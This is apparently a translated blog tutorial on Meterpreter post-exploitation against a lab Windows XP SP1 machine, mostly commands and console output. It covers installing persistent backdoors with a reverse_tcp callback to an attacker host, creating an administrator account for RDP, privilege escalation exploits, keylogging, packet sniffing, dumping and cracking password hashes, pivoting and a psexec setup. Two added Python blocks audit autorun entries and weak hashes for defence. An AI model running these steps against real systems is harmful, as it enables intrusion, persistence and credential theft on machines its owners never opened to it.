
A First Look at Meterpreter on BT5r3

Date: 2017/3/1 13:51:34   Editor: About Linux

The previous article used BeEF and Metasploit to get a meterpreter session on an XP SP1 machine.

This article goes one step further and uses Meterpreter to work this poor XP box over.

The article is long; use the table of contents.

=========================================

1. What is Meterpreter?

Nothing more than shellcode resident in memory. It looks roughly like this (the original article shows a diagram here):

It is a step up from the usual attack methods. A typical payload works like this:
(1) use the payload to open a port A on the victim machine
(2) bind a command shell to A
(3) the attacker connects to A and interacts with the victim machine


The downsides of that approach:
(1) a new process is created, which is easy to spot
(2) attacker and victim exchange data over a port, which is easy for an IDS to spot
(3) the victim process may be chrooted (change root directory), which limits what you can do


The advantages of meterpreter:
(1) purely in memory; every API it needs to call is hooked
(2) XOR encryption in 16-byte blocks, with the traffic wrapped in SSL
In short, it is hard to detect, and cross-platform support and extensibility are all solid..


2. Common Meterpreter commands

Basic commands:
background  # put meterpreter into the background
sessions -i index   # interact with a session; index is the session number (1 is the first session)
quit  # exit the session
shell # get a command prompt on the target
irb # open a ruby shell

File system commands:
cat c:\\boot.ini   # show file contents
getwd # show the current working directory
upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
download nimeia.txt /root/Desktop/   # download a file to the local machine
edit c:\\boot.ini  # edit a file
search -d c:\\windows -f *.mdb # search for files


Network commands:
ipconfig / ifconfig # show network interface information
portfwd  add -l 5555 -p 3389 -r 192.168.198.129 # port forward: listen on local port 5555 and relay it to the target's 3389
root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
route # show the routing table

System commands:
ps # list the running processes
migrate  pid # migrate the Meterpreter session into the process with the given pid
execute -H -i -f cmd.exe # start a new cmd.exe process; -H hidden, -i interactive
getpid # get the pid of the current process
kill pid # kill a process
getuid # show which user we are running as
sysinfo # show target system information, such as hostname and operating system
shutdown # shut the machine down

Having got this far, let's rank the commands:
First place: ps + migrate. We got in through IE; what if IE gets closed? If the user never visits the hooked page again, we would never get a shell again.. So migrate early into another process space, such as Explorer.exe, which nobody closes..
Second place: execute, because it gives us cmd.exe.
Third place: portfwd, port forwarding; in practice you almost always need to forward something~
Readers, if you disagree with my ranking, leave a comment and share your view~~


3. Meterpreter and the post-exploitation modules

I always assumed Meterpreter == Metasploit's post-exploitation modules, but that is not the case. A quick primer on how the Metasploit penetration testing platform is organised:
AUX auxiliary modules    information gathering
Exploit modules          exploitation
Post modules             host control and extended attacks, supporting the whole penetration test

Meterpreter is a Metasploit payload, just a much more powerful one. Its relationship to the post modules is that it is the channel through which they are carried out. The post modules are written in Ruby, and the target very likely has no Ruby interpreter, so how does that work? (the original article shows a diagram here)



4. Backdoors

1) Check whether the target is a virtual machine:

meterpreter > run post/windows/gather/checkvm 

[*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....
[*] This is a VMware Virtual Machine
If it is a VM, enthusiasm drops.. it may well be a honeypot..

2) Installing a backdoor, method one:

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[*] Persistent agent script is 609628 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agent executed with PID 1888
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
It then creates a vbs file under C:\windows\Temp\ on the target, which is started at boot. The vbs really is there, and the autorun entry is there too, but then there is this (the original article shows a screenshot here): a prompt telling everyone to delete the thing and remove the autostart..
Why would something Meterpreter produces be exposed so easily on XP?
I looked into it a bit: NTVDM is part of the Win16 virtual machine, the virtual machine Windows uses for backward compatibility with 16-bit programs. But why does it come up here?
I'll leave this as an open question; if some passing expert sees it, could you give me an answer?


3) Installing a backdoor, method two:

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
meterpreter > 
It listens on 31337 and uploads three files (metsrv.dll, metsvc-server.exe and metsvc.exe), and then a new auto-starting service called Meterpreter appears on the target machine...

Then connect:
msf  exploit(handler) > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp
msf  exploit(handler) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800

meterpreter > 
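Both backdoor methods above leave something an administrator can look for: method one writes a randomly named .vbs into C:\WINDOWS\TEMP and points a Run-key value at it, method two installs a service. As an added example (not code from the article or from Metasploit), here is a small audit that parses the text `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` prints and flags entries with the traits of the persistence script: a script file launched from a Temp directory under a random-looking name. The sample registry output is constructed for this example; the value name and script path are the ones the article's output shows, the other two entries are made up. The same parser would work over the Services key for method two.

```python
r"""Audit Windows Run-key autoruns for Meterpreter-style persistence.

Added example, not part of the original article. It parses `reg query
HKLM\Software\Microsoft\Windows\CurrentVersion\Run` output and flags
entries that share traits with the persistence script: a random-looking
value name that launches a script file from a Temp directory.
"""
import re

# Constructed sample of what `reg query ...\Run` prints on the compromised XP box.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    tTCmdZkXLp      REG_SZ    C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
    ctfmon.exe      REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# A reg query value line is: name, type, data, separated by runs of spaces.
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")

TEMP_DIRS = ("\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1")


def parse_run_key(text):
    """Return a list of (name, type, data) tuples from reg query output."""
    entries = []
    for line in text.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            entries.append((match["name"], match["type"], match["data"].strip()))
    return entries


def looks_random(name):
    """Heuristic: letters only, 8+ chars, and frequent upper/lower switches.

    Human-chosen names ("VMware Tools", "ctfmon.exe") contain spaces, dots or
    digits and rarely flip case every other letter; generated names such as
    tTCmdZkXLp do both. Expect some false positives from products with
    CamelCase names; treat it as a hint, not a verdict.
    """
    if not name.isalpha() or len(name) < 8:
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return switches >= len(name) // 3


def audit_run_key(text):
    """Flag autorun entries that share traits with the persistence script."""
    findings = []
    for name, _type, data in parse_run_key(text):
        # Split the command line into tokens, honouring quoted paths with spaces.
        tokens = [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', data)]
        reasons = []
        if any(any(d in t for d in TEMP_DIRS) for t in tokens):
            reasons.append("runs from a Temp directory")
        if any(t.endswith(SCRIPT_EXTS) for t in tokens):
            reasons.append("launches a script file")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append({"name": name, "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_key(SAMPLE_REG_OUTPUT):
        print(f"{f['name']}: {f['data']}  <- {', '.join(f['reasons'])}")
```

Run it and only the tTCmdZkXLp entry is reported, with all three reasons. Any one reason alone is weak evidence; a script in Temp that is also auto-started and randomly named is worth pulling the file for.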

4) getgui + 3389

I don't think this is very useful: it just creates an account, adds it to the "Remote Desktop Users" and "Administrators" groups, and then you connect over 3389 (via portfwd if the target is on an internal network).. And even that "not very useful" assumes the other side has 3389 enabled..
meterpreter > run getgui -u aa -p 123qwe 
If nothing went wrong, user aa with password 123qwe has been added and put into those two groups.. Then:
msf  exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389
Connected~ If the target is on an internal network, forward the port first:
portfwd  add -l 5555 -p 3389 -r 192.168.0.111 # port forward: listen on local port 5555 and relay it to the target's 3389
root@bt:~#  rdesktop -u Administrator -p 123qwe 127.0.0.1:5555


5. Privilege escalation

1) The straightforward way: getsystem

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
		0 : All techniques available
		1 : Service - Named Pipe Impersonation (In Memory/Admin)
		2 : Service - Named Pipe Impersonation (Dropper/Admin)
		3 : Service - Token Duplication (In Memory/Admin)
		4 : Exploit - KiTrap0D (In Memory/User)


meterpreter > 
getsystem tries four techniques to escalate; the part in parentheses, e.g. (In Memory/Admin), gives the required environment and the starting privilege level.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
SYSTEM is the highest privilege level..


2) MS10-073: keyboard layout file privilege escalation vulnerability

meterpreter > background
[*] Backgrounding session 5...
msf > set session 5 
session => 5
msf > use post/windows/escalate/ms10_073_kbdlayout 
msf  post(ms10_073_kbdlayout) > exploit

[*] Attempting to elevate PID 0x278
[*] {"GetLastError"=>0, "return"=>1548}
[*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom ..
[*] Allocated 0x8000 bytes of memory @ 0x60630000
[*] Initialized RWX buffer ...
[*] Current Keyboard Layout: 0x8040804
[*] Patched in syscall wrapper @ 0x60631000
[*] Successfully executed syscall wrapper!
[*] Attempting to cause the ring0 payload to execute...
[*] SendInput: {"GetLastError"=>5, "return"=>1}
[*] Post module execution completed
msf  post(ms10_073_kbdlayout) > 

3) MS10-092: Windows Task Scheduler privilege escalation vulnerability

msf  post(ms10_073_kbdlayout) > back
msf > set session 5
session => 5
msf > use post/windows/escalate/ms10_092_schelevator 
msf  post(ms10_092_schelevator) > exploit

[-] Windows XP (Build 2600, Service Pack 1). is not vulnerable.
[*] Post module execution completed
msf  post(ms10_092_schelevator) > 
Sigh, shamefully all I can pick on is XP SP1.. how pathetic..

6. Stealing information

1) dumplinks: recent system activity, recently accessed files and similar records

meterpreter > run post/windows/gather/dumplinks 

[*] Running module against EMASTER-8G5WOLV
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk.
	[*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
[*] No Recent directory found for user LocalService. Nothing to do.
[*] No Recent Office files found for user LocalService. Nothing to do.
[*] No Recent directory found for user NetworkService. Nothing to do.
[*] No Recent Office files found for user NetworkService. Nothing to do.

2) Keystroke logging

It works most of the time; if nothing is captured, reconnect:
meterpreter > keyscan_start 
Starting the keystroke sniffer...
meterpreter > keyscan_dump 
Dumping captured keystrokes...
dir <Return> cd  <Ctrl>  <LCtrl>  zhuomian1 <Back>  <Back>  <Back>  <Back> 11 <Back>  <Back> zhuo <Return> =-1 <Tab>  <Return>  <CapsLock> dir <Return>  <Back>  <Back>  <Back>  <Back>  <Ctrl>  <LCtrl>  dir <CapsLock>  <Back>  <Back> r <Back> ir <Return> 
meterpreter > keyscan_dump 
Dumping captured keystrokes...
 <Return>  <Return>  <N5>  <N6>  <N4>  <N5>  <N4>  <N5>  <N9>  <N1>  <N3>  xugyabq    <Back>  <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl>  <LCtrl> s <Back>  <Back>  <Back>  <Back> emaster <Left> -- <Back>  <Back> _ <Ctrl>  <LCtrl> s
meterpreter > keyscan_stop 
Stopping the keystroke sniffer...
meterpreter > 



3) enum_applications: patches, updates, antivirus and so on

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on EMASTER-8G5WOLV

Installed Applications
======================

 Name                              Version
 ----                              -------
 Adobe Flash Player 11 ActiveX     11.9.900.152
 VMware Tools                      8.1.4.11056
 WebFldrs XP                       9.50.6513
 Windows Installer 3.1 (KB893803)  3.1


[*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt
meterpreter > 


7. Stealing system passwords

1) sniffer: network sniffing

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces 

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_interfaces  1

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start  1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump  1 /tmp/xpsp1.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 355 packets (101378 bytes)
[*] Downloaded 100% (101378/101378)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/xpsp1.cap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 157 packets (40891 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > 

Then type wireshark in a shell and open /tmp/xpsp1.cap (the original article shows a screenshot here):

2) IE cache

meterpreter > run post/windows/gather/enum_ie 

[*] IE Version: 6.0.2800.1106
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
	File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
	File: C:\Documents and Settings\LocalService\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
meterpreter > 
As it says here, this only works for IE7 and above..

3) Grabbing and cracking hashes

Before looking at how to grab hashes, a word about connecting BT5 to the database:
msf  auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml
[*] exec: cat /opt/metasploit/config/database.yml


#
# These settings are for the database used by the Metasploit Framework
# unstable tree included in this installer, not the commercial editions.
#
development:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5

production:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5
msf  auxiliary(jtr_crack_fast) > db_connect msf3:4bfedfc2@localhost:7337/msf3dev 
Connection format: db_connect username:password@localhost:port/database_name; all of these values are in /opt/metasploit/config/database.yml
If you run into the message "gem install pg", it is a configuration problem:
vi /opt/metasploit/msf3/msfconsole
change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby at the top of msfconsole.
For the reasoning behind this change, see the troubleshooting write-up (linked in the original).

That completes the database setup. One more remark: you have to db_connect by hand every time msf starts..
Basic approach one:
msf  exploit(handler) > use post/windows/gather/hashdump 
msf  post(hashdump) > set session 1
session => 1
msf  post(hashdump) > exploit

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::


[*] Post module execution completed

Basic approach two:
meterpreter > hashdump
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter > 
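The hashdump lines above have the pwdump layout user:rid:LM:NT:::, and the hash material itself says a lot about how the box is configured. As an added example (not code from the article or from Metasploit), here is an audit of that format built on two well-known constants: the LM hash of the empty password, whose two 8-byte halves are each the LM hash of an empty 7-character half, and the NT hash of the empty password. The sample dump is the one shown above.

```python
"""Audit a pwdump-style hash dump for weak password storage.

Added example, not code from the article. Each line has the form
user:rid:LM_hash:NT_hash::: exactly as meterpreter's hashdump prints it.
"""
EMPTY_LM_HALF = "aad3b435b51404ee"             # LM DES block for an empty 7-char half
EMPTY_LM = EMPTY_LM_HALF * 2                   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash (MD4 of UTF-16LE "") of the empty password

# The dump shown in the article above.
SAMPLE_DUMP = """\
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
"""


def parse_pwdump(text):
    """Return [(user, rid, lm, nt), ...]; blank and malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append((user, rid, lm, nt))
    return records


def audit_record(user, rid, lm, nt):
    """Findings for one account, derived from the hash material alone."""
    reasons = []
    if nt == EMPTY_NT:
        reasons.append("blank password")
    if lm != EMPTY_LM:
        # An LM hash is only stored when the NoLMHash policy is off and the
        # password is at most 14 characters. LM uppercases the password and
        # hashes each 7-character half separately, which is why it cracks fast.
        reasons.append("LM hash stored (NoLMHash not enforced, password <= 14 chars)")
        if lm[16:] == EMPTY_LM_HALF:
            reasons.append("password is 7 characters or fewer (second LM half is empty)")
    if rid == 500 and reasons:
        reasons.append("built-in Administrator account (RID 500)")
    return reasons


def audit_pwdump(text):
    """Map each user with something to report to its list of findings."""
    report = {}
    for user, rid, lm, nt in parse_pwdump(text):
        reasons = audit_record(user, rid, lm, nt)
        if reasons:
            report[user] = reasons
    return report


if __name__ == "__main__":
    for user, reasons in audit_pwdump(SAMPLE_DUMP).items():
        print(f"{user}: {'; '.join(reasons)}")
```

On this dump the audit reports Guest with a blank password, Administrator with an LM hash whose second half is empty (so the password has at most 7 characters), and HelpAssistant with an LM hash stored. That empty second half is exactly why the John run further down finds 123QWE in the LM pass and 123qwe in the NT pass: LM is case-insensitive and the 6-character password fits in one half. The fixes are the usual ones: set NoLMHash (or use passwords of 15 characters or more, which cannot be LM-hashed at all) and disable Guest.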

But this approach has drawbacks:
it does nothing without SYSTEM privileges..
it is unstable on Win7, Vista and Win2008..
it fails under UAC (User Account Control)..

The smart approach:
meterpreter > run post/windows/gather/smart_hashdump 

[*] Running module against EMASTER-8G5WOLV
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] 	Obtaining the boot key...
[*] 	Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] 	Obtaining the user list and keys...
[*] 	Decrypting user keys...
[*] 	Dumping password hashes...
[+] 	Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
[+] 	HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
[+] 	SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter > 

The smart flow (as extended reading):
check the privileges we already have and the system type
check whether the host is a domain controller
read the hashes from the registry; if that fails, inject into the LSASS process; on a domain controller inject into LSASS directly
on Win2008 with an administrator-level session, try getsystem; if LSASS cannot be injected as SYSTEM, first migrate into a process running as SYSTEM, then inject into LSASS
on Win7/Vista with UAC off and an administrator-level session, try getsystem and read the hashes
on Win2003/XP/2000, just getsystem and read the hashes

Check the database:
msf  auxiliary(jtr_crack_fast) > creds

Credentials
===========

host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
192.168.0.111  445   guest             aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  smb_hash  true
192.168.0.111  445   administrator     123qwe                                                             password  true
192.168.0.111  445   guest                                                                                password  true
192.168.0.111  445   administrator     daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011  smb_hash  true
192.168.0.111  445   helpassistant     866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb  smb_hash  true
192.168.0.111  445   support_388945a0  aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881  smb_hash  true

[*] Found 6 credentials.
msf  auxiliary(jtr_crack_fast) > 

Cracking with John the Ripper: an open-source cracker that bundles several hash algorithms, aimed at weak Unix/Linux passwords (Windows works too); fortunately msf integrates this big gun..
msf  post(hashdump) > use auxiliary/analyze/jtr_crack_fast 
msf  auxiliary(jtr_crack_fast) > exploit

[*] Seeded the password database with 6 words...
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 1  time: 0:00:00:06 DONE (Sat Dec  7 14:36:28 2013)  c/s: 5791K  trying: WIT1900 - ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: 123QWE           (cred_1)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 1  time: 0:00:00:08 DONE (Sat Dec  7 14:36:37 2013)  c/s: 18967K  trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 0  time: 0:00:00:00 DONE (Sat Dec  7 14:36:37 2013)  c/s: 1234K  trying: 89093 - 89092
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
[*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::

[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::

[*] 

[*] 3 password hashes cracked, 2 left

/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)

guesses: 1  time: 0:00:00:20 DONE (Sat Dec  7 14:36:58 2013)  c/s: 10089K  trying: zydeco1900 - 123qwe1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: 123qwe           (cred_1)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 1  time: 0:00:00:09 DONE (Sat Dec  7 14:37:07 2013)  c/s: 17311K  trying: |||}
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 0  time: 0:00:00:00 DONE (Sat Dec  7 14:37:08 2013)  c/s: 1388K  trying: 89030 - 89092
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
[*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::

[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] 

[*] 2 password hashes cracked, 2 left

[+] Cracked: administrator:123qwe (192.168.0.111:445)
[+] Cracked: guest: (192.168.0.111:445)
[*] Auxiliary module execution completed
msf  auxiliary(jtr_crack_fast) > 

As you can see, the weak password I set on XP, 123qwe, has been cracked.. but jtr cannot do much against stronger passwords..

8. Internal network penetration

1) Adding a route

Very often, getting from the DMZ into the internal network needs a pivot, and msf's route add makes pivoting easy. The current session is 1; in MSF: route add <internal subnet> <netmask> <session ID>
meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf  auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1
[*] Route added
msf  auxiliary(jtr_crack_fast) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.255.0      Session 1

msf  auxiliary(jtr_crack_fast) > 
With that, msf has added a route for the 192.168.0.0/24 network over session 1: all of the attacker's traffic to that network is now relayed through session 1.

2) Port 445 scanning: file and printer sharing service

In plain terms, IPC$, got it..
I'll just paste the commands; I don't think it is that useful, nmap does the scanning just fine..
msf  auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24 
RHOST => 192.168.0.0/24
msf  auxiliary(jtr_crack_fast) > set PORTS 445
PORTS => 445
msf  auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp 
msf  auxiliary(tcp) > run
For some reason it finds nothing; after run it just sits there..


3) psexec attack on port 445: SMB hash passing

msf  exploit(psexec) > use exploit/windows/smb/psexec 
msf  exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
